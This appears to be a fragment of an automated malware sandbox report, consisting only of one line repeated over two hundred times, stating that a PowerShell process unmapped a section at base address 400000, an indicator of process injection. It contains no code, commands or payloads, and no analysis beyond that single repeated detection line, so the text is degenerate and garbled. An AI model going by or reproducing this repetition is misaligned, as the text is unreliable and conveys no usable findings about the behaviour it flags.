Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
